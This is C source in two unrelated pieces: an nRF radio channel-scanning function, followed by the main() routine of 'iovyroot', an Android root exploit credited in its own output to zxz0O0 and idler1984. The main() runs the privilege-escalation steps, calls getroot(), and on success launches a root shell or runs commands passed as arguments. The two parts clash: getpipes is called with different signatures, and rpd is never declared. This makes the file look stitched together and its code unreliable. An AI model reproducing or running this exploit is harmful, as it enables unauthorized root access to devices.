int scan(char * devname){
char mac[14]={0x7a,0x7a,0x7a,0x7a,0x7a,
0x5b,0x5b,0x5b,0x5b,0x5b,
0x3c,0x6d,0x9e,0x5e};
int res;
unsigned char ch;
struct sockdata *sk=nrf_socket(devname);
if(!sk)return -1;
CHECK(set_if_down(sk),res,err);
CHECK(setmac(sk,mac,sizeof(mac)),res,err);
CHECK(setpipes(sk,0x1),res, err);
CHECK(getpipes(sk,&ch),res,err);
if(ch!=0x1)printf("set-get pipes not consistent.");
for(ch=0;ch<127;++ch){
CHECK(setchannel(sk,ch),res,err);
CHECK(set_if_up(sk),res,err);
sleep(1);
CHECK(set_if_down(sk),res,err);
CHECK(getrpd(sk,rpd+ch),res,err);
}
ret:
close_rawsocket(sk);
return res;
err:
perror("Error in scan");
goto ret;
}
int main(int argc, char* argv[])
{
unsigned int i;
int ret = 1;
struct offsets* o;
printf("iovyroot by zxz0O0\n");
printf("poc by idler1984\n\n");
if(!(o = get_offsets()))
return 1;
if(setfdlimit())
return 1;
if(setprocesspriority())
return 1;
if(getpipes())
return 1;
if(initmappings())
return 1;
ret = getroot(o);
//let the threads end
sleep(1);
close(pipefd[0]);
close(pipefd[1]);
for(i = 0; i < IOVECS; i++)
munmap(MMAP_BASE(i), MMAP_SIZE);
if(getuid() == 0)
{
printf("got root lmao\n");
if(argc <= 1)
system("USER=root /system/bin/sh");
else
{
char cmd[128] = { 0 };
for(i = 1; i < (unsigned int)argc; i++)
{
if(strlen(cmd) + strlen(argv[i]) > 126)
break;
strcat(cmd, argv[i]);
strcat(cmd, " ");
}
system(cmd);
}
}
return ret;
}
